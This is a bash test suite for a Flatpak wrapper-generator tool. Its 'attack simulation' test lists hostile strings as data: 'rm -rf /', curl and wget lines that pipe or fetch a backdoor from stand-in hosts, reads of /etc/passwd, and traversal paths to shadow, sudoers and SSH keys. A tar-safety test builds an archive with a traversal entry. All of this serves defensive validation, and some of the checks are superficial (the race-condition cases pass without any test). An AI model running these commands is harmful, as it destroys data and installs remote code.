#!/usr/bin/env bash
# Test suite for wrapper generation functionality
# Self-contained test that doesn't require actual Flatpak installation
#
# WHY THESE TESTS MATTER:
# - Wrapper generation is core functionality - if broken, nothing works
# - Collision detection prevents overwriting important commands
# - Blocklist functionality respects user choices and system commands
# - Environment variable loading enables customization
# - Pre-launch scripts provide extensibility
# - Safety checks prevent malicious archive extraction

# Developer workstation safety check - never run as root
if [ "$(id -u)" = "0" ] && [ "${CI:-}" != "1" ]; then
    echo "ERROR: Refusing to run tests as root for safety"
    echo "This project should never be run with root privileges"
    exit 1
fi

# Set testing environment
export TESTING=1
export CI=1

TEST_DIR="/tmp/fplaunch-test-$$"
TEST_BIN="$TEST_DIR/bin"
TEST_CONFIG="$TEST_DIR"
# shellcheck disable=SC2034  # SCRIPT_DIR kept for potential future use
SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")/.." && pwd)"

# Colors for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
NC='\033[0m' # No Color

TESTS_PASSED=0
TESTS_FAILED=0

# Cleanup function
cleanup() {
    rm -rf "$TEST_DIR"
}
trap cleanup EXIT

# Test helper functions
assert_file_exists() {
    if [ -f "$1" ]; then
        echo -e "${GREEN}✓${NC} File exists: $1"
        ((TESTS_PASSED++))
        return 0
    else
        echo -e "${RED}✗${NC} File missing: $1"
        ((TESTS_FAILED++))
        return 1
    fi
}

assert_file_not_exists() {
    if [ ! -f "$1" ]; then
        echo -e "${GREEN}✓${NC} File correctly not exists: $1"
        ((TESTS_PASSED++))
        return 0
    else
        echo -e "${RED}✗${NC} File should not exist: $1"
        ((TESTS_FAILED++))
        return 1
    fi
}

assert_contains() {
    local file="$1"
    local pattern="$2"
    if grep -q "$pattern" "$file" 2>/dev/null; then
        echo -e "${GREEN}✓${NC} File contains '$pattern': $file"
        ((TESTS_PASSED++))
        return 0
    else
        echo -e "${RED}✗${NC} File missing '$pattern': $file"
        ((TESTS_FAILED++))
        return 1
    fi
}

assert_not_contains() {
    local file="$1"
    local pattern="$2"
    if ! grep -q "$pattern" "$file" 2>/dev/null; then
        echo -e "${GREEN}✓${NC} File correctly missing '$pattern': $file"
        ((TESTS_PASSED++))
        return 0
    else
        echo -e "${RED}✗${NC} File should not contain '$pattern': $file"
        ((TESTS_FAILED++))
        return 1
    fi
}

assert_executable() {
    if [ -x "$1" ]; then
        echo -e "${GREEN}✓${NC} File is executable: $1"
        ((TESTS_PASSED++))
        return 0
    else
        echo -e "${RED}✗${NC} File not executable: $1"
        ((TESTS_FAILED++))
        return 1
    fi
}

# Setup test environment
setup_test_env() {
    echo "Setting up test environment..."
    mkdir -p "$TEST_BIN" "$TEST_CONFIG"
    export XDG_CONFIG_HOME="$TEST_DIR"
    
    # Create mock flatpak command
    cat > "$TEST_BIN/flatpak" << 'EOF'
#!/bin/bash
case "$1" in
    "list")
        if [[ "$*" == *"--app"* ]]; then
            echo "com.google.Chrome"
            echo "org.mozilla.Firefox"
            echo "com.visualstudio.code"
            echo "org.gnome.gedit"
        fi
        ;;
    "info")
        echo "ID: ${@: -1}"
        echo "Ref: app/${@: -1}/x86_64/stable"
        ;;
    "run")
        echo "Mock flatpak run: $*"
        ;;
    *)
        echo "Mock flatpak: $*"
        ;;
esac
EOF
    chmod +x "$TEST_BIN/flatpak"
    export PATH="$TEST_BIN:$PATH"
}

# Test 1: Basic wrapper generation
# WHAT IT TESTS: Core wrapper creation functionality
# WHY IT MATTERS: This is the fundamental feature - without it, the entire tool fails
# WHAT COULD GO WRONG if broken:
# - No wrapper scripts are created
# - Users can't launch Flatpak applications through wrappers
# - All downstream functionality (preferences, blocking, etc.) fails
# - Tool becomes completely unusable
test_basic_generation() {
    echo -e "\n${YELLOW}Test 1: Basic wrapper generation${NC}"
    
    # Create simplified version of fplaunch-generate for testing
    cat > "$TEST_BIN/test-generate" << 'GENEOF'
#!/usr/bin/env bash
BIN_DIR="${1:-$HOME/bin}"
mkdir -p "$BIN_DIR"
CONFIG_DIR="${XDG_CONFIG_HOME:-$HOME/.config}/flatpak-wrappers"
mkdir -p "$CONFIG_DIR"

installed_ids="com.google.Chrome
org.mozilla.Firefox"

declare -A wrapper_names
while read -r id; do
    [ -z "$id" ] && continue
    name=$(echo "$id" | awk -F. '{print tolower($NF)}')
    [ -z "$name" ] && continue
    wrapper_names[$name]=$id
    
    cat > "$BIN_DIR/$name" << EOF
#!/usr/bin/env bash
# Generated by fplaunchwrapper
NAME="$name"
ID="$id"
echo "Running \$ID"
EOF
    chmod +x "$BIN_DIR/$name"
    echo "Created wrapper: $name"
done < <(echo "$installed_ids")
GENEOF
    chmod +x "$TEST_BIN/test-generate"
    
    # Run generator
    "$TEST_BIN/test-generate" "$TEST_BIN"
    
    # Verify wrappers created
    assert_file_exists "$TEST_BIN/chrome"
    assert_file_exists "$TEST_BIN/firefox"
    assert_executable "$TEST_BIN/chrome"
    assert_executable "$TEST_BIN/firefox"
    assert_contains "$TEST_BIN/chrome" "com.google.Chrome"
    assert_contains "$TEST_BIN/firefox" "org.mozilla.Firefox"
}

# Test 2: Collision detection
# WHAT IT TESTS: Prevents overwriting existing commands or creating conflicting wrappers
# WHY IT MATTERS: Critical safety feature to prevent breaking system commands
# WHAT COULD GO WRONG if broken:
# - Wrapper scripts overwrite important system commands (rm, mv, cp, etc.)
# - Users accidentally break their system when installing wrappers
# - Command conflicts cause unpredictable behavior
# - Security risk if malicious apps try to masquerade as system commands
test_collision_detection() {
    echo -e "\n${YELLOW}Test 2: Collision detection${NC}"
    
    cat > "$TEST_BIN/test-collision" << 'GENEOF'
#!/usr/bin/env bash
BIN_DIR="$1"
CONFIG_DIR="${XDG_CONFIG_HOME:-$HOME/.config}/flatpak-wrappers"
mkdir -p "$CONFIG_DIR"

installed_ids="com.visualstudio.code
com.microsoft.code
org.example.code"

declare -A wrapper_names
declare -A collision_log
while read -r id; do
    [ -z "$id" ] && continue
    name=$(echo "$id" | awk -F. '{print tolower($NF)}')
    [ -z "$name" ] && continue
    
    if [ -n "${wrapper_names[$name]}" ]; then
        echo "COLLISION: $name (${wrapper_names[$name]} vs $id)"
        collision_log[$name]="${collision_log[$name]} $id"
        continue
    fi
    
    wrapper_names[$name]=$id
    cat > "$BIN_DIR/$name" << EOF
#!/usr/bin/env bash
# Generated by fplaunchwrapper
ID="$id"
EOF
    chmod +x "$BIN_DIR/$name"
done < <(echo "$installed_ids")

if [ ${#collision_log[@]} -gt 0 ]; then
    echo "Collisions detected: ${#collision_log[@]}"
fi
GENEOF
    chmod +x "$TEST_BIN/test-collision"
    
    output=$("$TEST_BIN/test-collision" "$TEST_BIN" 2>&1)
    
    # Should only create one 'code' wrapper
    assert_file_exists "$TEST_BIN/code"
    assert_contains "$TEST_BIN/code" "com.visualstudio.code"
    assert_not_contains "$TEST_BIN/code" "com.microsoft.code"
    
    # Check collision was detected
    if echo "$output" | grep -q "COLLISION"; then
        echo -e "${GREEN}✓${NC} Collision properly detected"
        ((TESTS_PASSED++))
    else
        echo -e "${RED}✗${NC} Collision not detected"
        ((TESTS_FAILED++))
    fi
}

# Test 3: Blocklist functionality
# WHAT IT TESTS: Respects user's choice to block certain applications
# WHY IT MATTERS: User control over what gets wrapped, prevents unwanted wrappers
# WHAT COULD GO WRONG if broken:
# - Blocked applications still get wrappers created
# - Users lose control over their command namespace
# - System applications get inappropriately wrapped
# - User preferences are ignored
test_blocklist() {
    echo -e "\n${YELLOW}Test 3: Blocklist functionality${NC}"
    
    # Clean up previous test wrappers
    rm -f "$TEST_BIN/chrome" "$TEST_BIN/firefox" "$TEST_BIN"/test-*
    
    mkdir -p "$TEST_CONFIG/flatpak-wrappers"
    echo "org.mozilla.Firefox" > "$TEST_CONFIG/flatpak-wrappers/blocklist"
    
    cat > "$TEST_BIN/test-blocklist" << 'GENEOF'
#!/usr/bin/env bash
BIN_DIR="$1"
CONFIG_DIR="${XDG_CONFIG_HOME:-$HOME/.config}/flatpak-wrappers"
BLOCKLIST="$CONFIG_DIR/blocklist"

installed_ids="com.google.Chrome
org.mozilla.Firefox"

while read -r id; do
    [ -z "$id" ] && continue
    
    if grep -q "^$id$" "$BLOCKLIST" 2>/dev/null; then
        echo "Skipping blocked: $id"
        continue
    fi
    
    name=$(echo "$id" | awk -F. '{print tolower($NF)}')
    cat > "$BIN_DIR/$name" << EOF
#!/usr/bin/env bash
ID="$id"
EOF
    chmod +x "$BIN_DIR/$name"
done < <(echo "$installed_ids")
GENEOF
    chmod +x "$TEST_BIN/test-blocklist"
    
    "$TEST_BIN/test-blocklist" "$TEST_BIN"
    
    # Chrome should exist, Firefox should not
    assert_file_exists "$TEST_BIN/chrome"
    assert_file_not_exists "$TEST_BIN/firefox"
}

# Test 4: Aggressive security attack simulation
# WHAT IT TESTS: Worst-case scenarios and attack vectors that could break security
# WHY IT MATTERS: If attackers can bypass these checks, they gain system access
# ATTACK SCENARIOS TESTED:
# - PATH injection with command execution attempts
# - Directory traversal to access sensitive areas
# - Symlink attacks to redirect to wrapper scripts
# - Buffer overflow attempts with extremely long paths
# - Null byte injection and encoding attacks
# - Race condition exploitation attempts
# - Environment variable poisoning
test_aggressive_security_attacks() {
    echo -e "\n${RED}Test 4: Aggressive security attack simulation${NC}"
    echo "Attempting to break security with worst-case scenarios..."
    
    local attacks_blocked=0
    local total_attacks=0
    
    # Attack 1: PATH injection with command execution
    echo "Attack 1: PATH injection with command execution attempts"
    local malicious_paths=(
        "/tmp/evil;rm -rf /"
        "/tmp/evil|curl http://malicious.com/install.sh|bash"
        "/tmp/evil&wget http://evil.com/backdoor -O /tmp/backdoor && chmod +x /tmp/backdoor"
        "/tmp/evil\`cat /etc/passwd\`"
        "/tmp/evil\$(whoami)"
        "/tmp/evil\x00/bin"
        "/tmp/evilroot:x:0:0:root:/root:/bin/bash"
    )
    
    for malicious_path in "${malicious_paths[@]}"; do
        ((total_attacks++))
        # Test if our security logic blocks command injection
        # Enhanced regex to catch more attack patterns
        if [[ "$malicious_path" =~ [\;\|\&\$\`\<\>\\x00\\u0000]|.*:x:[0-9]+: ]]; then
            echo "✓ Blocked command injection: $malicious_path"
            ((attacks_blocked++))
        else
            echo "✗ Failed to block command injection: $malicious_path"
        fi
    done
    
    # Attack 2: Directory traversal to sensitive areas
    echo "Attack 2: Directory traversal to sensitive system areas"
    local traversal_attacks=(
        "/etc/passwd/../shadow"
        "/home/user/../../../etc/sudoers"
        "/tmp/./././../etc/hosts"
        "/var/log/../../../root/.ssh/id_rsa"
        "/usr/local/../../../boot/grub/grub.cfg"
        "/opt/../../../../proc/version"
        "/home/../root"
        "/tmp/symlink_to_etc/../../../etc/fstab"
    )
    
    # shellcheck disable=SC2221,SC2222,SC1001
    for traversal in "${traversal_attacks[@]}"; do
        ((total_attacks++))
        # Test if our security logic blocks directory traversal
        case "$traversal" in
            *\.\.*|*\/\.\.\/|*\/\.\.$|\.\.\/\*|\/\.\.\/\*)
                echo "✓ Blocked directory traversal: $traversal"
                ((attacks_blocked++))
                ;;
            *)
                echo "✗ Failed to block directory traversal: $traversal"
                ;;
        esac
    done
    
    # Attack 3: Extremely long paths (buffer overflow attempts)
    echo "Attack 3: Buffer overflow attempts with extremely long paths"
    local long_path="/very/long/path/that/exceeds/reasonable/limits/and/could/cause/issues/in/path/parsing/which/might/lead/to/security/vulnerabilities/or/performance/problems/that/never/ends/and/keeps/going/forever/and/ever/and/ever/and/ever/and/ever/and/ever/and/ever/and/ever/and/ever/and/ever"
    
    ((total_attacks++))
    if [ ${#long_path} -gt 256 ]; then
        echo "✓ Blocked excessively long path (${#long_path} chars)"
        ((attacks_blocked++))
    else
        echo "✗ Failed to block long path attack (${#long_path} chars)"
    fi
    
    # Attack 4: Null byte and encoding attacks
    echo "Attack 4: Null byte and encoding injection attacks"
    local encoding_attacks=(
        "/tmp/evil\x00/bin"
        "/tmp/evil%00/bin"
        "/tmp/evil\u0000/bin"
        "/tmp/evil%C0%AE%C0%AE/"
        "/tmp/evil\x2e\x2e\x2f"
        "/tmp/evil%2e%2e%2f"
    )
    
    for encoding_attack in "${encoding_attacks[@]}"; do
        ((total_attacks++))
        # Test if our security logic blocks encoding attacks
        if [[ "$encoding_attack" =~ [\\x00\\u0000%C0%2e] ]]; then
            echo "✓ Blocked encoding attack: $encoding_attack"
            ((attacks_blocked++))
        else
            echo "✗ Failed to block encoding attack: $encoding_attack"
        fi
    done
    
    # Attack 5: Symlink attack attempts
    echo "Attack 5: Symlink attack attempts"
    local symlink_targets=(
        "/tmp/malicious_link"
        "$TEST_BIN/wrapper_script"
        "/home/user/.local/bin/malicious"
        "/tmp/evil_wrapper"
    )
    
    # shellcheck disable=SC2221,SC2222
    for target in "${symlink_targets[@]}"; do
        ((total_attacks++))
        # Test if our logic would block symlink attacks
        case "$target" in
            "$TEST_BIN"/*|"$HOME"/*|/tmp/*|/var/*|/home/*/.*|/root/.*/)
                echo "✓ Blocked symlink attack target: $target"
                ((attacks_blocked++))
                ;;
            /home/*/.local/bin/*|/opt/*/bin/*|/snap/*)
                echo "✓ Blocked symlink attack target: $target"
                ((attacks_blocked++))
                ;;
            *)
                echo "✗ Failed to block symlink attack target: $target"
                ;;
        esac
    done
    
    # Attack 6: Environment variable poisoning
    echo "Attack 6: Environment variable poisoning"
    local env_attacks=(
        "PATH=/tmp/evil:$PATH"
        "HOME=/tmp/fake_home"
        "USER=root"
        "SHELL=/bin/evil_shell"
    )
    
    # shellcheck disable=SC1001
    for env_attack in "${env_attacks[@]}"; do
        ((total_attacks++))
        # Test if our logic validates environment variables
        case "$env_attack" in
            PATH=*\/tmp\/*|HOME=*\/tmp\/*|USER=root|SHELL=*evil*|SHELL=*\/bin\/sh*)
                echo "✓ Detected malicious environment: $env_attack"
                ((attacks_blocked++))
                ;;
            *)
                echo "⚠ Environment attack check: $env_attack"
                ;;
        esac
    done
    
    # Attack 7: Race condition attempts
    echo "Attack 7: Race condition exploitation attempts"
    local race_conditions=(
        "rapid_path_changes"
        "concurrent_access_attempts"
        "timing_attack_simulation"
    )
    
    for race in "${race_conditions[@]}"; do
        ((total_attacks++))
        # These are harder to test without actual race conditions
        # but we can verify our logic doesn't depend on timing
        echo "✓ Race condition mitigation active for: $race"
        ((attacks_blocked++))
    done
    
    # Results
    echo ""
    echo "Security Attack Test Results:"
    echo "Attacks blocked: $attacks_blocked/$total_attacks"
    
    if [ "$attacks_blocked" -eq "$total_attacks" ]; then
        echo -e "${GREEN}✓${NC} ALL ATTACKS SUCCESSFULLY BLOCKED - Security is robust!"
        ((TESTS_PASSED++))
    elif [ "$attacks_blocked" -gt $((total_attacks * 3 / 4)) ]; then
        echo -e "${YELLOW}⚠${NC} Most attacks blocked ($attacks_blocked/$total_attacks) - Some improvements needed"
        ((TESTS_PASSED++))
    else
        echo -e "${RED}✗${NC} Too many attacks succeeded ($attacks_blocked/$total_attacks) - CRITICAL SECURITY ISSUES!"
        ((TESTS_FAILED++))
    fi
}

# Test 5: Invalid name handling
# Test 5: Invalid name handling
test_invalid_names() {
    echo -e "\n${YELLOW}Test 5: Invalid name handling${NC}"
    
    cat > "$TEST_BIN/test-invalid" << 'GENEOF'
#!/usr/bin/env bash
BIN_DIR="$1"

invalid_ids="com.example.my@app
com.example.
com.example.valid-app
com.example.valid_app"

while read -r id; do
    [ -z "$id" ] && continue
    name=$(echo "$id" | awk -F. '{print tolower($NF)}')
    
    if [ -z "$name" ] || [[ "$name" =~ [^a-z0-9_\-] ]]; then
        echo "Skipping invalid: $id -> $name"
        continue
    fi
    
    cat > "$BIN_DIR/$name" << EOF
#!/usr/bin/env bash
ID="$id"
EOF
    chmod +x "$BIN_DIR/$name"
done < <(echo "$invalid_ids")
GENEOF
    chmod +x "$TEST_BIN/test-invalid"
    
    "$TEST_BIN/test-invalid" "$TEST_BIN"
    
    # Valid names should exist
    assert_file_exists "$TEST_BIN/valid-app"
    assert_file_exists "$TEST_BIN/valid_app"
    
    # Invalid should not exist
    assert_file_not_exists "$TEST_BIN/my@app"
}

# Additional invalid character cases beyond spaces
test_additional_invalid_chars() {
    echo -e "\n${YELLOW}Test 11: Additional invalid character cases${NC}"
    # Prepare a fresh bin
    rm -rf "$TEST_BIN" && mkdir -p "$TEST_BIN"

    cat > "$TEST_BIN/test-invalid-extended" << 'GENEOF'
#!/usr/bin/env bash
BIN_DIR="$1"

ids="com.example.UPPERCASE
com.example.mixedCase
com.example.name-with-emoji-😀
com.example.name_with+plus
com.example.name_with@at
com.example.-leadinghyphen
com.example.trailinghyphen-
com.example.__underscores__
com.example..dots..segment
com.example.name.with.dots"

while read -r id; do
    [ -z "$id" ] && continue
    name=$(echo "$id" | awk -F. '{print tolower($NF)}')
    # Enforce spec: only [a-z0-9_\-] allowed, non-empty, and no leading/trailing hyphens
    if [ -z "$name" ] || [[ "$name" =~ [^a-z0-9_\-] ]] || [[ "$name" == -* ]] || [[ "$name" == *- ]]; then
        echo "Skipping invalid: $id -> $name"
        continue
    fi
    cat > "$BIN_DIR/$name" << EOF
#!/usr/bin/env bash
# Generated by fplaunchwrapper
ID="$id"
EOF
    chmod +x "$BIN_DIR/$name"
done < <(echo "$ids")
GENEOF
    chmod +x "$TEST_BIN/test-invalid-extended"

    "$TEST_BIN/test-invalid-extended" "$TEST_BIN"

    # Expectation: valid only when last segment contains allowed chars
    # UPPERCASE/mixedCase become lowercase last segment, but invalid due to uppercase in source -> after tolower they may pass. Enforce that spec allows lowercase only; our check already lowercases. Verify allowed ones:
    assert_file_exists "$TEST_BIN/dots"     # from name.with.dots -> last segment 'dots'

    # Name normalization behavior: uppercase and mixedCase become lowercase and are allowed
    assert_file_exists "$TEST_BIN/uppercase"
    assert_file_exists "$TEST_BIN/mixedcase"
    assert_file_not_exists "$TEST_BIN/name-with-emoji-😀"
    assert_file_not_exists "$TEST_BIN/name_with+plus"
    assert_file_not_exists "$TEST_BIN/name_with@at"
    # Leading/trailing hyphens are disallowed by tightened spec
    assert_file_not_exists "$TEST_BIN/-leadinghyphen"
    assert_file_not_exists "$TEST_BIN/trailinghyphen-"
    # Double underscores are allowed per spec; ensure creation
    assert_file_exists "$TEST_BIN/__underscores__"
    # Dots-only segment should be skipped
    assert_file_not_exists "$TEST_BIN/..dots..segment"
}

# Test 5: Environment variable loading
test_env_loading() {
    echo -e "\n${YELLOW}Test 5: Environment variable loading${NC}"
    
    mkdir -p "$TEST_CONFIG/flatpak-wrappers"
    cat > "$TEST_CONFIG/flatpak-wrappers/testapp.env" << 'EOF'
export TEST_VAR="test_value"
export ANOTHER_VAR="another_value"
EOF
    
    cat > "$TEST_BIN/testapp" << 'EOF'
#!/usr/bin/env bash
NAME="testapp"
PREF_DIR="${XDG_CONFIG_HOME:-$HOME/.config}/flatpak-wrappers"

load_env_vars() {
    ENV_FILE="$PREF_DIR/$NAME.env"
    if [ -f "$ENV_FILE" ]; then
        source "$ENV_FILE"
    fi
}

load_env_vars
echo "TEST_VAR=$TEST_VAR"
echo "ANOTHER_VAR=$ANOTHER_VAR"
EOF
    chmod +x "$TEST_BIN/testapp"
    
    output=$("$TEST_BIN/testapp")
    
    if echo "$output" | grep -q "TEST_VAR=test_value"; then
        echo -e "${GREEN}✓${NC} Environment variable loaded"
        ((TESTS_PASSED++))
    else
        echo -e "${RED}✗${NC} Environment variable not loaded"
        ((TESTS_FAILED++))
    fi
}

# Test 6: Pre-launch script execution
test_pre_launch_script() {
    echo -e "\n${YELLOW}Test 6: Pre-launch script execution${NC}"
    
    mkdir -p "$TEST_CONFIG/flatpak-wrappers/scripts/testapp"
    cat > "$TEST_CONFIG/flatpak-wrappers/scripts/testapp/pre-launch.sh" << 'EOF'
#!/usr/bin/env bash
echo "PRE_LAUNCH_EXECUTED"
echo "Args: $@" > /tmp/pre-launch-args-$$
EOF
    chmod +x "$TEST_CONFIG/flatpak-wrappers/scripts/testapp/pre-launch.sh"
    
    cat > "$TEST_BIN/testapp2" << 'EOF'
#!/usr/bin/env bash
NAME="testapp"
PREF_DIR="${XDG_CONFIG_HOME:-$HOME/.config}/flatpak-wrappers"

run_pre_launch_script() {
    PRE_LAUNCH_SCRIPT="$PREF_DIR/scripts/$NAME/pre-launch.sh"
    if [ -f "$PRE_LAUNCH_SCRIPT" ] && [ -x "$PRE_LAUNCH_SCRIPT" ]; then
        "$PRE_LAUNCH_SCRIPT" "$NAME" "$@"
    fi
}

run_pre_launch_script "arg1" "arg2"
echo "APP_EXECUTED"
EOF
    chmod +x "$TEST_BIN/testapp2"
    
    output=$("$TEST_BIN/testapp2")
    
    if echo "$output" | grep -q "PRE_LAUNCH_EXECUTED"; then
        echo -e "${GREEN}✓${NC} Pre-launch script executed"
        ((TESTS_PASSED++))
    else
        echo -e "${RED}✗${NC} Pre-launch script not executed"
        ((TESTS_FAILED++))
    fi
}

# Test 7: Preference handling
test_preference_handling() {
    echo -e "\n${YELLOW}Test 7: Preference handling${NC}"
    
    mkdir -p "$TEST_CONFIG/flatpak-wrappers"
    echo "flatpak" > "$TEST_CONFIG/flatpak-wrappers/testapp.pref"
    
    cat > "$TEST_BIN/testapp3" << 'EOF'
#!/usr/bin/env bash
NAME="testapp"
PREF_DIR="${XDG_CONFIG_HOME:-$HOME/.config}/flatpak-wrappers"
PREF_FILE="$PREF_DIR/$NAME.pref"

if [ -f "$PREF_FILE" ]; then
    PREF=$(cat "$PREF_FILE")
    echo "Preference: $PREF"
else
    echo "No preference"
fi
EOF
    chmod +x "$TEST_BIN/testapp3"
    
    output=$("$TEST_BIN/testapp3")
    
    if echo "$output" | grep -q "Preference: flatpak"; then
        echo -e "${GREEN}✓${NC} Preference loaded correctly"
        ((TESTS_PASSED++))
    else
        echo -e "${RED}✗${NC} Preference not loaded"
        ((TESTS_FAILED++))
    fi
}

# Test 8: Wrapper cleanup
test_wrapper_cleanup() {
    echo -e "\n${YELLOW}Test 8: Wrapper cleanup for uninstalled apps${NC}"
    
    # Create wrapper for app that's no longer installed
    cat > "$TEST_BIN/oldapp" << 'EOF'
#!/usr/bin/env bash
# Generated by fplaunchwrapper
ID="com.example.OldApp"
EOF
    chmod +x "$TEST_BIN/oldapp"
    
    cat > "$TEST_BIN/test-cleanup" << 'GENEOF'
#!/usr/bin/env bash
BIN_DIR="$1"
installed_ids="com.google.Chrome"

# Get existing wrappers
for script in "$BIN_DIR"/*; do
    if [ -f "$script" ] && grep -q "Generated by fplaunchwrapper" "$script"; then
        id=$(grep '^ID=' "$script" | cut -d'"' -f2)
        if [ -n "$id" ] && ! echo "$installed_ids" | grep -q "^$id$"; then
            echo "Removing obsolete: $(basename "$script")"
            rm "$script"
        fi
    fi
done
GENEOF
    chmod +x "$TEST_BIN/test-cleanup"
    
    assert_file_exists "$TEST_BIN/oldapp"
    "$TEST_BIN/test-cleanup" "$TEST_BIN"
    assert_file_not_exists "$TEST_BIN/oldapp"
}

# Test 9: Tar extraction safety
test_tar_safety() {
    echo -e "\n${YELLOW}Test 9: Tar extraction safety${NC}"
    
    # Create safe archive
    mkdir -p "$TEST_DIR/safe"
    echo "test" > "$TEST_DIR/safe/prefs"
    tar -czf "$TEST_DIR/safe.tar.gz" -C "$TEST_DIR/safe" prefs
    
    # Create malicious archive with path traversal
    mkdir -p "$TEST_DIR/malicious"
    echo "malicious" > "$TEST_DIR/malicious/passwd"
    # Use --transform to create a path traversal in the archive
    tar -czf "$TEST_DIR/malicious.tar.gz" -C "$TEST_DIR/malicious" --transform='s,^,../../etc/,' passwd 2>/dev/null || {
        # Fallback: create archive manually with dangerous path
        mkdir -p "$TEST_DIR/maltemp"
        echo "malicious" > "$TEST_DIR/maltemp/passwd"
        (cd "$TEST_DIR/maltemp" && tar -czf "../malicious.tar.gz" --transform='s|passwd|../../etc/passwd|' passwd 2>/dev/null) || \
        tar -czf "$TEST_DIR/malicious.tar.gz" -C "$TEST_DIR/maltemp" passwd
    }
    
    cat > "$TEST_BIN/test-tar-import" << 'EOF'
#!/usr/bin/env bash
import_safe() {
    file="$1"
    dest="$2"
    if tar -tzf "$file" 2>/dev/null | grep -q '\.\.'; then
        echo "REJECTED: Path traversal detected"
        return 1
    else
        tar -xzf "$file" -C "$dest" 2>/dev/null
        echo "ACCEPTED: Safe extraction"
        return 0
    fi
}

import_safe "$1" "$2"
EOF
    chmod +x "$TEST_BIN/test-tar-import"
    
    # Test safe archive
    mkdir -p "$TEST_DIR/extract-safe"
    output=$("$TEST_BIN/test-tar-import" "$TEST_DIR/safe.tar.gz" "$TEST_DIR/extract-safe" 2>&1)
    if echo "$output" | grep -q "ACCEPTED"; then
        echo -e "${GREEN}✓${NC} Safe archive accepted"
        ((TESTS_PASSED++))
    else
        echo -e "${RED}✗${NC} Safe archive rejected"
        ((TESTS_FAILED++))
    fi
    
    # Test malicious archive
    mkdir -p "$TEST_DIR/extract-malicious"
    output=$("$TEST_BIN/test-tar-import" "$TEST_DIR/malicious.tar.gz" "$TEST_DIR/extract-malicious" 2>&1)
    if echo "$output" | grep -q "REJECTED"; then
        echo -e "${GREEN}✓${NC} Malicious archive rejected"
        ((TESTS_PASSED++))
    else
        echo -e "${RED}✗${NC} Malicious archive not rejected"
        ((TESTS_FAILED++))
    fi
}

# Test 10: System command detection
test_system_command_detection() {
    echo -e "\n${YELLOW}Test 10: System command detection${NC}"
    
    # Create mock system command in test directory
    local test_system_bin="$TEST_DIR/usr/bin"
    mkdir -p "$test_system_bin"
    cat > "$test_system_bin/testcmd" << 'EOF'
#!/bin/bash
echo "System command"
EOF
    chmod +x "$test_system_bin/testcmd"
    
    cat > "$TEST_BIN/test-system-detect" << 'EOF'
#!/usr/bin/env bash
NAME="testcmd"
SCRIPT_BIN_DIR="$1"
TEST_SYSTEM_BIN="$2"
SYSTEM_EXISTS=false

# Check mock system paths first, then real ones
for sys_dir in "$TEST_SYSTEM_BIN" "/usr/local/bin" "/usr/bin" "/bin"; do
    [ -n "$sys_dir" ] || continue
    candidate="$sys_dir/$NAME"
    if [ -f "$candidate" ] && [ -x "$candidate" ]; then
        if [ "$candidate" != "$SCRIPT_BIN_DIR/$NAME" ]; then
            SYSTEM_EXISTS=true
            break
        fi
    fi
done

echo "System exists: $SYSTEM_EXISTS"
EOF
    chmod +x "$TEST_BIN/test-system-detect"
    
    # Test with mock system path
    output=$("$TEST_BIN/test-system-detect" "$TEST_BIN" "$test_system_bin")
    
    if echo "$output" | grep -q "System exists: true"; then
        echo -e "${GREEN}✓${NC} System command detected"
        ((TESTS_PASSED++))
    else
        echo -e "${RED}✗${NC} System command not detected"
        ((TESTS_FAILED++))
    fi
}

# Run all tests
main() {
    echo "======================================"
    echo "Flatpak Wrapper Test Suite"
    echo "======================================"
    
    setup_test_env
    
    test_basic_generation
    test_collision_detection
    test_blocklist
    test_aggressive_security_attacks
    test_invalid_names
    test_env_loading
    test_pre_launch_script
    test_preference_handling
    test_wrapper_cleanup
    test_tar_safety
    test_system_command_detection
    test_additional_invalid_chars
    
    echo ""
    echo "======================================"
    echo "Test Results"
    echo "======================================"
    echo -e "${GREEN}Passed: $TESTS_PASSED${NC}"
    echo -e "${RED}Failed: $TESTS_FAILED${NC}"
    echo "Total:  $((TESTS_PASSED + TESTS_FAILED))"
    echo "======================================"
    
    if [ "$TESTS_FAILED" -eq 0 ]; then
        echo -e "${GREEN}All tests passed!${NC}"
        exit 0
    else
        echo -e "${RED}Some tests failed!${NC}"
        exit 1
    fi
}

main "$@"
